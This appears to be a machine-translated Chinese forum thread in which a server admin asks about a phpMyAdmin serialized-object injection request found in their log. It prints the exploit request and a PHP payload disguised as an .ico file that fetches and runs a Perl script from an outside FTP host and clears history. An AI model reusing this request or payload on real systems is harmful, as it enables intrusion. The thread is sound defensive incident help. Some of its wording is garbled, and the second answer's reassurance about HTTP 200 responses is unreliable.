请帮帮我!我意识到我的 http 日志文件中记录了以下内容。
action=lay_navigation&eoltype=unix&token=a13369792c1a33ec1130500ca821c5a4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A47%3A%22ftp%3A%2F%2Fhawk1156%3ATuNPKPK123%40hawkish.co.uk%2Fieh.ico%22%3B%7D%7D
当我解码它时,它变成
action=lay_navigation&eoltype=unix&token=a13369792c1a33ec1130500ca821c5a4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:47:"ftp://hawk1156:[email protected]/ieh.ico";}}
我对这个可疑的 ftp 链接感到担心,并决定下载它。
wget ftp://hawk1156:[email protected]/ieh.ico
该文件的内容如下:
<? system("cd /tmp;rm -rf *;wget ftp://hawk1156:[email protected]/2.txt;perl 2.txt;curl -O hawk1156://ftp:[email protected]/2.txt;perl 2.txt;fetch hawk1156://ftp:[email protected]/2.txt;perl 2.txt;rm -rf 2.txt;history -c;");exit?>
当然,我从来没有亲自执行过,但我不确定我的服务器是否已经被黑客入侵了。我该怎么办?我不知道从哪里开始。
答案1
到目前为止还没有什么不好的情况,但还无法知道。
查看可疑的system评论,它试图让你运行的命令似乎会删除中的所有内容/tmp,但别无他处。此外,涉嫌网站已被托管提供商关闭,因此现在应该没什么可担心的了。请注意,由于删除了文件,套接字和服务上的 MySQL 连接将在下次重新启动前失败,/tmp但不应丢失任何数据(bash 历史记录除外)。
我只是非正式地告诉 PHPMyAdmin 开发人员,因此如果它不是一个可能被滥用的安全漏洞,那么就不会真正达成漏洞交易。
注入的大型代码中,以粗体显示的是一些有趣的命令:
<? system("cd /tmp;rm -rf * ... history -c;");exit?>
另外查看了一下,有一个文件,可能做了一些坏事,但由于我不知道文件中有什么,并且托管服务提供商已关闭该帐户,所以除非你设法尝试统计损失,否则无法知道它做了什么。ftp://hawk1156:[email protected]/2.txtext4undelete*它可能做了一些坏事。*如果您确实使用取消删除实用程序找到了该文件,请将其发布在这里,我会很乐意查看它。
编辑:感谢 January 的评论,我还没有注意到,这次攻击似乎所做的最多就是创建一个 IRC 机器人。如果仍在perl执行,并且您没有任何在 PERL 上运行的关键服务,则运行:
sudo killall perl
或重新启动。
答案2
是的,有人正在尝试对您的系统进行 PMA(PhpMyAdmin)攻击,只要您的服务器对该请求返回 200,您就没问题。